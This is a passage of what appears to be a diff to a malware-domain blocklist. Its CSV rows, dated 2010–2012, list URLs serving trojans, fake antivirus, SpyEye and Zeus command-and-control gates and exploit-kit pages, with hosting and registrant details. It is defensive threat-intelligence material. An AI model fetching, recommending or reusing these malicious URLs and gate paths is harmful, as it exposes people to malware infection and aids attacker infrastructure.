kit","abuse@dot.tk","31100","0","DE", +"2010/11/14_22:12","sexyster.tk/lo/load.php?f=1&e=6","217.119.57.22","bvtk02.synserver.de.","trojan downloader","abuse@dot.tk","31100","0","DE", +"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=0","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=1","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","backdoor CycBot","abuse@dot.tk","32613","0","CA", +"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=ftpgrabber","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","malware calls home","abuse@dot.tk","32613","0","CA", +"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=pokergrabber","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","malware calls home","abuse@dot.tk","32613","0","CA", +"2010/11/15_18:18","-","92.60.177.244/out/al8.php?i=15","grusha-92-60-177-244.hostinghutor.com.","trojan downloader","-","15772","0","UA", +"2010/11/15_18:37","-","89.209.91.49/e/bin/config.bin","stream-91.49.users.odessa.comstar.net.ua.","Spyeye config file","-","8359","0","UA", +"2010/11/15_18:37","-","89.209.91.49/e/bt_version_checker.php","stream-91.49.users.odessa.comstar.net.ua.","SpyEye C&C","-","8359","0","UA", +"2010/11/15_18:37","-","78.26.187.39/god/jwi.php?i=15","vps70-16.elaninet.com.","fake av","-","34187","0","UA", +"2010/11/16_18:59","-","91.217.162.176/dm3.exe","-","trojan TDSS","-","51441","0","UA", +"2010/11/16_18:59","web-domain.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/18_20:56","-","91.217.249.136/jwb.php?i=15","-","trojan Bredolab","-","51554","0","UA", +"2010/11/18_20:56","unlim-app.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/18_21:14","-","200.63.44.192/hk/show.php?key=27b7d8fb16d42bb82f9cf3a156f77994&u=user123","-","exploit 
kit","-","27716","0","PA", +"2010/11/18_21:14","-","200.63.44.192/hk/show.php?key=27b7d8fb16d42bb82f9cf3a156f77994&u=user123","-","trojan","-","27716","0","PA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/config.bin","-","SpyEye config file","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/k.exe","-","trojan SpyEye","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/load.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/45.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/baby.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v1crypted.exe","-","-","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v1crypted1.exe","-","-","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v2crypted.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v2crypted1.exe","-","trojan","-","41665","0","UA", +"2010/11/19_19:45","-","109.196.143.136/aff422_flsgejrlhjtrag.exe","-","trojan","-","39150","0","UA", +"2010/11/19_19:45","-","109.196.143.137/setup.exe","-","trojan","-","39150","0","UA", +"2010/11/19_19:45","-","78.26.187.41/god/bp.php?i=15","vps70-6.elaninet.com.","trojan downloader","-","34187","0","UA", +"2010/11/19_19:45","-","92.60.177.246/other/cu.php?i=15","grusha-92-60-177-246.hostinghutor.com.","trojan","-","15772","0","UA", +"2010/11/20_07:03","-","114.203.87.195/help.asp","-","exploit","-","9318","0","KR", +"2010/11/20_07:03","-","121.254.145.212/w3c/ad.exe","-","trojan","-","3786","0","KR", +"2010/11/20_09:49","-","204.45.48.15/shop/xsf.php?i=15","actualemailsavings.info.","fake av","-","30058","0","US", +"2010/11/21_11:02","-","128.134.30.87/w.exe","-","trojan","-","4766","0","KR", +"2010/11/21_11:02","-","128.134.30.87/s.exe","-","trojan","-","4766","0","KR", 
+"2010/11/21_16:10","new-address.tk/go/?afid=80","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/21_16:10","-","92.60.177.236/old/jzc.php?i=15","grusha-92-60-177-236.hostinghutor.com.","trojan","-","15772","0","UA", +"2010/11/22_07:25","-","91.217.162.158/pic/is.php?i=15","-","trojan downloader","-","51441","0","UA", +"2010/11/22_12:30","-","195.226.197.51/my_spl4/xt.php?i=15","-","trojan","-","51303","0","UA", +"2010/11/24_19:20","-","80.24.67.44/images/install_flash_player.exe","44.Red-80-24-67.staticIP.rima-tde.net.","trojan","-","3352","0","ES", +"2010/11/26_17:33","www.gameangel.com/System/html/js/html.js","121.156.126.10","-","iframe directs to exploit","HumanWorks / Minkyu Park park@minkyu.com","4766","0","KR", +"2010/11/26_19:18","-","69.50.208.164/stat/co.php?i=15","-","fake av","-","18866","0","US", +"2010/11/26_20:26","-","195.226.197.51/my_spl3/dzf.php?i=15","-","trojan","-","51303","0","UA", +"2010/11/26_20:26","-","69.50.195.232/","-","Bleeding Life exploit kit","-","18866","0","US", +"2010/11/26_21:56","-","91.207.182.55/xxx1/gw.php?i=15","-","trojan SpyEye","-","48280","0","UA", +"2010/12/02_17:39","-","109.196.143.136/setup.exe","-","fake av","-","39150","0","UA", +"2010/12/02_17:39","-","109.196.143.136/vlx777_sdhgjklaogreah.exe","-","trojan","-","39150","0","UA", +"2010/12/02_18:42","-","91.213.174.46/KillEXE.exe","-","trojan","-","29106","0","UA", +"2010/12/02_18:42","-","91.213.174.46/all-zahlung.exe","-","trojan Ramnit","-","29106","0","UA", +"2010/12/02_20:17","-","220.110.138.52/MNRSys/images/install_flash_player.exe","52.48.138.110.220.in-addr.arpa.","trojan","-","4713","0","JP", +"2010/12/03_17:29","-","201.76.178.58/.YAMAHA/kx.gif","mvx-201-76-178-58.mundivox.com.","trojan Banker","-","17222","0","BR", +"2010/12/03_17:29","-","201.76.178.58/.YAMAHA/sx.gif","mvx-201-76-178-58.mundivox.com.","trojan Banker","-","17222","0","BR", 
+"2010/12/03_17:29","-","201.76.178.58/.YAMAHA/24.gif","mvx-201-76-178-58.mundivox.com.","trojan Banker","-","17222","0","BR", +"2010/12/03_18:04","-","203.157.204.2/icons/facebook_toolbar.exe","-","irc backdoor","-","9649","0","TH", +"2010/12/08_13:37","vvps.ws/44/mothersdarlingcross.php?","91.200.240.46","-","trojan","contact@privacyprotect.org","48709","0","UA", +"2010/12/08_20:40","-","91.217.162.228/pic/cq.php?i=15","-","trojan downloader","-","51441","0","UA", +"2010/12/12_20:02","-","91.207.182.56/xxx1/gw.php?i=15","-","trojan SpyEye","-","48280","0","UA", +"2010/12/12_23:48","-","109.196.143.136/andru333_lfdshogerhah.exe","-","trojan","-","39150","0","UA", +"2010/12/12_23:48","-","109.196.143.137/setup.exe","-","trojan","-","39150","0","UA", +"2010/12/15_19:15","-","189.108.44.42/envc.php?praquem=dianalnogueira@gmail.com&titulo=Empresas%20000000-C9913A97%2011:11:47&texto=Sony%20Samsung%20Philipis%20Gradiente%20MMX%20EBX%20Toyota%20Volks%20BMW%20Mercedez%20Fiat","mail.lavapes.com.br.","maklware calls home","-","10429","0","BR", +"2010/12/15_19:15","-","222.24.94.19/default/index/images/manual/oracle.txt","-","Windows hosts file used by banking trojan","-","4538","0","CN", +"2010/12/15_19:15","-","202.38.97.217/manual/readme.txt","-","Windows hosts file used by banking trojan","-","4538","0","CN", +"2010/12/15_21:06","-","91.213.174.44/KillEXE.exe","-","trojan","-","29106","0","UA", +"2010/12/16_17:28","-","98.158.178.231/pics.scr","whm.profissionalizando.org.","backdoor","-","32780","0","US", +"2010/12/16_19:46","-","91.213.174.10/KillEXE.exe","-","trojan Banker","-","29106","0","UA", +"2010/12/16_19:46","-","69.197.135.51/ins/gts/xw.php?i=15","-","trojan","-","32097","0","US", +"2010/12/18_20:26","-","211.234.117.132/index.htm","-","IE exploit","-","3786","0","KR", +"2010/12/19_16:35","-","195.234.124.40/kor/du.php?i=15","-","trojan","-","20489","0","UA", 
+"2010/12/21_06:50","-","91.213.217.91/index.php?9t=w3N0U4cAIZamABawd7aWMGAE56&4TBG=28CPTYS8X181QOG5P6PTtO&80Il=WdbMk8vV24%2FPiw7&009jY=2V3N01&00=ATK2HJ1U73F8&8Ad03=MCoqPV&7AQe=OBVYMUtDK&0Cj9=VZPPUSVI5ZR9DI77X&46l5k=Q0E6IYM722K66&H7W=SgdOCT9iMD9gDmpSCF&h6=zBHtRBCprYmlnamd9BGJkTSE6Qw%3D%3D&MYyjG=JmfSNUZFJtelNxLwFm&O1u5v=VgclWgU","-","fake scanner page","-","49806","0","UA", +"2010/12/21_21:00","-","91.217.162.239/shikel/dz2.php?i=15","-","trojan","-","51441","0","UA", +"2010/12/21_21:00","-","69.50.209.109/stat/bv.php?i=15","-","trojan","-","18866","0","US", +"2010/12/25_13:35","-","116.255.180.231/smc/bue.php?i=15","-","trojan","-","4837","0","CN", +"2010/12/25_13:35","-","69.64.63.204/hqi.php?i=15","balder038.server4you.net.","trojan","-","30083","0","US", +"2010/12/25_13:57","-","173.244.194.236/goi.php?i=15","173.244.194.236.static.midphase.com.","trojan","-","36351","0","US", +"2010/12/26_10:17","-","211.234.117.47/index.htm","-","IE exploit","-","3786","0","KR", +"2010/12/26_11:57","-","67.21.76.6/zhk.htm","-","IE exploit","-","46844","0","US", +"2010/12/26_11:57","-","67.21.76.6/zfc.htm","-","IE exploit","-","46844","0","US", +"2010/12/27_17:18","-","193.107.172.11/abr.v.alg/gate.php?guid=User!SANDBOX2!D06F0742&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=4C78BF5E&md5=dbe81c844053e377da221d2d0bdb34d4","-","SpyEye C&C","-","196957","0","UA", +"2010/12/27_17:18","-","193.107.172.11/abr.v.alg/bin/config.bin","-","SpyEye config file","-","196957","0","UA", +"2010/12/27_17:55","-","91.207.182.56/xxx2/kt.php?i=15","-","fake av","-","48280","0","UA", +"2010/12/27_19:51","-","91.217.162.199/images/hni.php?i=15","-","trojan","-","51441","0","UA", +"2010/12/27_23:22","-","69.50.202.16/stop/xsd.php?i=15","-","trojan","-","18866","0","US", +"2010/12/28_18:17","-","116.255.180.231/elt/e/index.php","-","Eleonore Exploits pack v1.4.4mod","-","4837","0","CN", +"2010/12/28_18:17","-","116.255.180.231/elt/e/stat.php","-","control panel of Eleonore Exploits 
pack v1.4.4mod","-","4837","0","CN", +"2010/12/28_23:01","-","61.57.227.5/js/b1.asp","upgroup.piinet.net.","IE exploit","-","17710","0","TW", +"2010/12/28_23:01","-","61.57.227.5/js/b3.asp","upgroup.piinet.net.","IE exploit","-","17710","0","TW", +"2010/12/29_19:10","-","195.234.124.41/kor/du.php?i=15","-","trojan","-","20489","0","UA", +"2010/12/31_19:40","-","74.81.73.134:9082/exemple.com/index.php","gnax-ded100.simplehelix.com.","Eleonore exploit pack","-","16626","0","US", +"2010/12/31_19:40","-","74.81.73.134:9082/exemple.com/load.php?spl=javas","gnax-ded100.simplehelix.com.","trojan","-","16626","0","US", +"2010/12/31_23:36","-","125.141.196.59/A.asp","-","IE exploit","-","4766","0","KR", +"2011/01/03_17:34","beldiplomcom.75.com1.ru/true.php","89.108.66.188","cp60.agava.net.","exploit kit","domains@agava.com","43146","0","RU", +"2011/01/03_17:34","beldiplomcom.75.com1.ru/loading.php?spl=mdac","89.108.66.188","cp60.agava.net.","trojan FireThief","domains@agava.com","43146","0","RU", +"2011/01/08_17:42","-","173.192.136.92/sdh.htm","173.192.136.92-static.reverse.softlayer.com.","exploit","-","36351","0","US", +"2011/01/08_17:42","-","173.192.136.92/tow.htm","173.192.136.92-static.reverse.softlayer.com.","exploit","-","36351","0","US", +"2011/01/10_20:06","url-cameralist.tk/go/?afid=136","206.217.137.210","mail.ogairealeyes.com.","fake av","abuse@dot.tk","36352","0","US", +"2011/01/10_20:06","-","208.76.54.216/shop/gva.php?i=2","-","fake av","-","47869","0","US", +"2011/01/11_19:16","-","71.7.3.60/webctrl_client/1_0/TreeImages/rtl/l1.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan","-","30160","0","US", +"2011/01/11_19:16","-","71.7.3.60/webctrl_client/1_0/TreeImages/rtl/l2.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan","-","30160","0","US", +"2011/01/11_19:16","-","71.7.3.60/webctrl_client/1_0/TreeImages/rtl/l3.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan","-","30160","0","US", 
+"2011/01/12_14:33","-","220.128.152.141/aspnet_client/system_web/1_1_4322/flash.htm","220-128-152-141.HINET-IP.hinet.net.","leads to trojan Banker","-","3462","0","TW", +"2011/01/12_19:15","-","209.216.193.107/registrydoktor-newde.php","www.antivirus-reports.org.","fake av","-","21607","0","US", +"2011/01/14_18:43","-","89.187.50.195/index.php?3104c3a31c438f61b5e85b6b6c751c0e","-","exploit kit","-","25129","0","MD", +"2011/01/14_18:43","-","89.187.50.195/server_privileges.php?03b32fe00ceb95f0a9fc8dd78a0d58d1=3","-","trojan","-","25129","0","MD", +"2011/01/17_10:30","-","110.45.136.181/stat/x.asp","-","IE exploit","-","3786","0","KR", +"2011/01/20_11:16","-","71.7.3.60/webctrl_client/a/xp001.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan Banker","-","30160","0","US", +"2011/01/21_20:32","-","173.244.192.245/zfotp.htm","173.244.192.245.static.midphase.com.","IE exploit","-","36351","0","US", +"2011/01/23_20:06","site-checksite.tk/go/?afid=144","74.63.76.18","pc1.regionaladnetwork.com.","fake av","abuse@dot.tk","30058","0","US", +"2011/01/25_18:09","www.downloaddirect.com/software/vlc-player/2567","67.55.67.250","welcome23.webcamclub.com.","trojan","Design and Marketing DM S.A. 
/ juancarlos@loudmo.com","27257","0","US", +"2011/01/26_19:40","-","194.247.58.96/soln_1/knb.php?i=2","vpn10-dip-t-pool2-194-247-58.96.sevpn.com.","trojan SpyEye","-","52093","0","UA", +"2011/01/26_19:40","-","194.247.58.95/mypanel/gate.php?guid=5.1.2600!SANDBOX0!D06F0742&ver=10305&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=169E4359&md5=72079beedbc873cb73e7326ef3f8de56&plg=customconnector;webfakes;socks5;ftpbc;ccgrabber&stat=online","vpn10-dip-t-pool2-194-247-58.95.sevpn.com.","SpyEye C&C","-","52093","0","UA", +"2011/01/30_20:52","-","95.169.186.126/wp-logs/cm.php?i=15","ns.km33904.keymachine.de.","trojan downloader","-","31103","0","DE", +"2011/01/30_21:40","-","208.76.54.224/shop/jp.php?i=15","-","fake av","-","47869","0","US", +"2011/02/01_08:21","-","67.21.76.33/fvp.htm","-","IE exploit","-","46844","0","US", +"2011/02/01_08:21","-","67.21.76.33/rcf.htm","-","IE exploit","-","46844","0","US", +"2011/02/01_17:30","-","186.202.16.186/winjar2011.dll","cpro0867.publiccloud.com.br.","trojan Bancos","-","27715","0","BR", +"2011/02/02_13:30","-","195.242.182.30/xxx1/xob.php?i=15","-","trojan","-","44994","0","EU", +"2011/02/02_18:13","www.kcta.or.kr/js/json.js","210.109.97.193","193.0-255.97.109.210.in-addr.arpa.","obfuscated iframe leads to exploit","-","9848","0","KR", +"2011/02/02_18:13","www.spris.com/images/log.txt","210.114.221.53","-","IE exploit","spris corp. 
/ koo bonghoe wkpark@kumkang.com","4670","0","KR", +"2011/02/03_10:51","-","46.17.101.2/main/gate.php","-","SpyEye C&C","-","48211","0","RU", +"2011/02/05_17:53","-","91.200.240.7/Yh89RfaPh7bBss1zOFn7saOaOOa/bin/config.bin","-","SpyEye config file","-","48709","0","UA", +"2011/02/05_17:53","-","91.200.240.7/Yh89RfaPh7bBss1zOFn7saOaOOa/gate.php","-","SpyEye C&C","-","48709","0","UA", +"2011/02/05_20:56","orkut.krovatka.su/imagem-542454.jpg","194.186.88.38","ftp.krovatka.su.","trojan Banker","domain@hc.ru","3216","0","RU", +"2011/02/08_20:17","-","195.80.151.59/7box/dqj.php?i=15","-","trojan Bamital","-","50877","0","DE", +"2011/02/10_08:05","faq-candrive.tk/go/?afid=51","206.217.131.101","host.colocrossing.com.","fake av","abuse@dot.tk","36352","0","US", +"2011/02/12_09:57","-","194.247.58.51/ir7.php?i=15","vpn6-dip-t-pool2-194-247-58.51.sevpn.com.","trojan SpyEye","-","52093","0","UA", +"2011/02/12_09:57","hosting-controlnext.tk/go/?afid=51","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/12_09:57","hosting-controlid1.tk/go/?afid=156","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/13_10:45","hosting-controlid1.tk/go/?afid=90","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/13_22:04","hosting-controlpin.tk/go/?afid=51","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/13_22:50","hosting-controlpr.tk/go/?afid=51","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/18_18:03","bookofkisl.com/album.php","67.195.145.141","p8p-a.geo.vip.sp1.yahoo.com.","irc backdoor","Eliot Petersn / contact@myprivateregistration.com","36752","0","US", +"2011/02/18_20:25","-","91.200.240.7/T6yRslk8JrR5sOpskHs51L/bin/config.bin","-","SpyEye config file","-","48709","0","UA", 
+"2011/02/18_20:25","-","91.200.240.7/T6yRslk8JrR5sOpskHs51L/gate.php","-","SpyEye C&C","-","48709","0","UA", +"2011/02/19_16:50","infoweb-coolinfo.tk/90/?afid=90","46.21.169.41","-","fake av","abuse@dot.tk","42755","0","NL", +"2011/02/20_10:48","alissonluis-musico.sites.uol.com.br/mar.jpg","200.147.33.21","200-147-33-21.static.uol.com.br.","trojan Banker","Contato Administrativo - UOL / l-registrobr-uol@corp.uol.com.br","7162","0","BR", +"2011/02/20_11:07","-","194.247.58.174/js/config.bin","vpn18-dip-t-pool29-194-247-58.174.sevpn.com.","SpyEye config file","-","52093","0","UA", +"2011/02/21_08:18","-","91.200.240.7/T6yRslk8JrR5sOpskHs51L/bin/config.bin","-","SpyEye C&C","-","48709","0","UA", +"2011/02/22_20:34","-","71.235.85.177/images/xc.gif","c-71-235-85-177.hsd1.ct.comcast.net.","trojan Banload","-","7015","0","US", +"2011/02/22_20:34","-","200.13.244.245/cw-assenda/bin/es/es/post.asp","static-epm200-13-244-245.epm.net.co.","malware calls home","-","13489","0","CO", +"2011/02/22_20:34","-","200.13.244.245/cw-assenda/bin/es/es/contador.asp","static-epm200-13-244-245.epm.net.co.","infection counter","-","13489","0","CO", +"2011/02/24_21:26","skiholidays4beginners.com/subtraction-scorpio-male-and-virgo-female-compatiblity/","67.215.248.8","-","Compromised site leading to fake AV","Alan Garcia / domainadmin@freeola.co.uk","29761","0","US", +"2011/02/24_21:26","patrickhickey.eu/concertina-free-short-skits-scripts-in-hindi-for-independence-day/","89.234.64.136","web4.hosting.digiweb.ie.","Compromised site leading to fake AV","NOT DISCLOSED! 
/ domains@europeregistry.com","31122","0","IE", +"2011/02/24_21:26","rolemodelstreetteam.invasioncrew.com/raazuc/Dossier-For-M","98.131.132.1","rev.opentransfer.com.1.132.131.98.in-addr.arpa.","Compromised site leading to fake AV","Invasion Crew / sandy@invasioncrew.com","32392","0","US", +"2011/02/24_21:26","hy-brasil.mhwang.com/","212.117.169.139","ip-212-117-169-139.server.lu.","Compromised site leading to fake AV","info@achievement.com.sg","5577","0","LU", +"2011/02/24_21:26","marx-brothers.mhwang.com/","212.117.169.139","ip-212-117-169-139.server.lu.","Compromised site leading to fake AV","info@achievement.com.sg","5577","0","LU", +"2011/02/24_21:26","networkmedical.com.hk/defeating-innova-champion-discs-inc-raven/","66.7.213.86","queen.host-care.com.","Compromised site leading to fake AV","alfredau0310@hotmail.com","33182","0","US", +"2011/02/24_21:30","wallpapers91.com","67.23.129.220","-","Exploit","Indjijacafe / Indjijacafe vujo91@gmail.com","12053","0","CA", +"2011/02/25_16:20","rat-on-subway.mhwang.com/","212.117.169.139","ip-212-117-169-139.server.lu.","Compromised site leading to fake AV","info@achievement.com.sg","5577","0","LU", +"2011/02/25_16:20","www.dowdenphotography.com/ps/wy-template-printable-brain-cap-teaching-anatomy.htm","74.53.86.114","gator518.hostgator.com.","Compromised site leading to fake AV","HostGator / support@hostgator.com","21844","0","US", +"2011/03/11_15:52","-","174.127.70.195/8545/4544/","174.127.70.195.static.midphase.com.","fake AV","-","36351","0","US", +"2011/03/12_14:57","seet10.jino.ru","81.177.139.113","srv16-h-st.jino.ru.","Trojan","info@avguro.ru","8342","0","RU", +"2011/03/12_14:57","vkont.bos.ru","194.186.208.8","as3.centre.ru.","Trojan","web@centre.ru","3216","0","RU", +"2011/03/13_21:47","download207.mediafire.com/2ezaemp68lyg/fe8lc6kqa1f06n1/Grand+Theft+Modification.zip","38.114.196.226","-","trojan","RE> / PRE>","46179","0","US", +"2011/03/18_19:29","-","69.50.192.250:8000","-","malware calls 
home","-","18866","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/3299664/manual-básico-de-windows-movie-maker.exe","204.93.38.152","-","Win32/FirseriaInstaller.C","-","20940","0","US", +"2011/03/20_17:23","-","70.38.124.97/distrmaincp/","-","SpyEye C&C","-","32613","0","CA", +"2011/03/20_17:23","-","91.220.62.84/123/index.php","-","Eleonore Exploits pack version 1.4.4mod","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/123/stat.php","-","control panel of Eleonore Exploits pack version 1.4.4mod","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/123/load.php?spl=mdac","-","trojan downloader","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/info/load.php?file=0","-","backdoor Cycbot","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/info/load.php?file=1","-","fake av","-","51699","0","UA", +"2011/03/22_19:21","-","70.43.40.116/PRISM/CSS/a.gif","70.43.40.116.nw.nuvox.net.","trojan Banload","-","11456","0","US", +"2011/03/22_19:21","-","70.43.40.116/PRISM/CSS/b.gif","70.43.40.116.nw.nuvox.net.","trojan","-","11456","0","US", +"2011/03/22_19:21","-","70.43.40.116/PRISM/CSS/c.gif","70.43.40.116.nw.nuvox.net.","trojan","-","11456","0","US", +"2011/03/26_16:01","-","95.64.8.76/hex/jwh.php?i=15","-","fake av","-","49873","0","RO", +"2011/04/01_04:46","www.widestep.com/files/ws_qk_install.exe","205.186.183.224","ekiaioocks.gs07.gridserver.com.","Win32/Agent.HSDNOGR","widestep@mail.ru","31815","0","US", +"2011/05/30_10:22","www.casamama.nl/","109.72.86.5","nl05.pcextreme.nl.","obfuscated iframe on compromised site leads to exploit kit","-","48635","0","NL", +"2011/07/04_19:06","-","186.190.213.10/dl/","wan18.b2bprovidersite.com.","trojan","-","52302","0","PA", +"2011/07/09_02:48","-","186.190.213.10/x/","wan18.b2bprovidersite.com.","Trojan.FakeAV","-","52302","0","PA", +"2011/07/14_05:52","-","79.142.65.179/crack-keygen/592147/emu8086-300.html","hosted-by.altushost.com.","Leads to Renos trojan","-","49544","0","EU", 
+"2011/07/14_05:52","-","79.142.65.179/crack-keygen/223644/wavclean-183.html","hosted-by.altushost.com.","Leads to Renos trojan","-","49544","0","EU", +"2011/07/14_05:52","-","79.142.65.179/crack-keygen/390415/pdf-snake-v237-for-adobe-acrobat.html","hosted-by.altushost.com.","Leads to Renos trojan","-","49544","0","EU", +"2011/07/21_15:16","-","77.221.149.219/get/311/23639","77.221.149.219.addr.datapoint.ru.","Fraud Skype setup","-","30968","0","RU", +"2011/07/26_18:33","-","46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot","-","trojan","-","51632","0","UA", +"2011/07/28_01:54","seoholding.com/13/overblog","80.91.176.192","ds2.hosted.in.","Redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/07/28_01:54","seonetwizard.com/in.cgi?3","80.91.176.192","ds2.hosted.in.","Redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/07/29_23:50","seoholding.com/13/overblog&usg=AFQjCNGS7Xe0yilVQ6lGj3Oroonf7-gfhg","80.91.176.192","ds2.hosted.in.","Redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/07/30_20:33","-","46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=odayz&","-","trojan","-","51632","0","UA", +"2011/07/31_19:47","www.makohela.tk/kingofthelamers.jar","72.20.53.34","server9020.alkareklam.com.","java exploit","E-mail: domain@isimtescil.net","25761","0","US", +"2011/08/17_23:29","crackzone.net/data/Super_Mp3_Download_Version_3.3.4.6_serial_keys_gen-bee3afe71a.html","188.95.53.17","-","Rootkit.0Access","Private Whois crackzone.net h875b0j4d9500ec582d0@oqjij874d9300d54bd95.privatewhois.net","57172","0","EU", +"2011/08/31_21:38","seoholding.com/13/boardhost","80.91.176.192","ds2.hosted.in.","redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/09/12_18:49","www.infra.by/conflq.php","91.149.157.133","vh16.hoster.by.","obfuscated iframe leads to exploit kit","-","6697","0","BY", 
+"2011/09/18_15:59","elocumjobs.com/_sql/1/index.php?spl=mdac","78.136.20.106","132775-www1.ecarers.com.","fake av","Balfor Recruitment Group Ltd (BALFO04979) / domain-admin@easily.co.uk","15395","0","GB", +"2011/10/21_23:55","-","121.10.107.78:88/b7/0.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/1.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/3.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/4.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/5.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/6.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/7.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/8.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/9.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/10.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/11.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/13.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/11/10_21:52","-","202.157.165.152/zfin.html","-","redirects to exploit kit","-","9892","0","SG", +"2011/11/16_18:14","nobodyspeakstruth.narod.ru/upload/main.exe","87.250.250.83","wrz.yandex.ru.","trojan","-","13238","0","RU", +"2014/03/23_10:15","aintdoinshit.com/","74.220.207.85","host85.hostmonster.com.","Backdoor.IRCBot","Registrar Abuse Contact support@hostmonster.com","46606","0","US", +"2012/02/26_21:35","cswilliamsburg.com/site7/data/","174.122.148.94","5e.94.7aae.static.theplanet.com.","CrimePack exploit kit","Michael Basford / -","21844","0","US", 
+"2012/03/17_20:32","-","31.186.102.170/lolomgfucku/3214spackasd324/","-","Bleeding Life exploit kit","-","49505","0","RU", +"2012/03/17_20:32","-","31.186.102.170/lolomgfucku/3214spackasd324//download_file.php?e=JavaSignedApplet","-","trojan","-","49505","0","RU", +"2012/04/01_19:58","-","178.248.85.67/zeus/config.bin","67.85.248.178.sta.211.ru.","zeus config file","-","41794","0","RU", +"2012/04/01_19:58","-","178.248.85.67/zeus/gate.php","67.85.248.178.sta.211.ru.","zeus drop zone","-","41794","0","RU", +"2012/04/02_20:11","-","193.107.19.80/inter/gate.php?hwid=4281525696&pc=COMPUTERNAME&localip=127.0.0.1&winver=x32","-","malware calls home","-","197794","0","RU", +"2012/04/05_08:08","-","211.44.250.173:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","9318","0","KR", +"2012/04/05_08:08","-","180.235.150.72:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","45731","0","ID", +"2012/04/08_09:23","-","188.127.249.241/~alert/alert.php?id=5","-","Message text for Ransom","-","48172","0","RU", +"2012/04/09_12:25","-","112.78.124.115:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","9371","0","JP", +"2012/04/10_08:31","-","88.190.22.72:8080/navigator/jueoaritjuir.php","sd-29537.dedibox.fr.","Phoenix exploit kit","-","12322","0","FR", +"2012/04/10_08:31","-","89.31.145.154:8080/navigator/jueoaritjuir.php","vserver-mpfppr2.nexen.net.","Phoenix exploit kit","-","41628","0","FR", +"2012/04/10_08:31","-","62.85.27.129:8080/navigator/jueoaritjuir.php","sw-gbit-1.gw.27-129.ime.lv.","Phoenix exploit kit","-","39201","0","LV", +"2012/04/10_08:31","-","219.94.194.138:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","9371","0","JP", +"2012/04/11_20:36","-","62.109.29.101/a/xwy.php?i=15","geovanne.fvds.ru.","Zeus trojan","-","29182","0","LU", 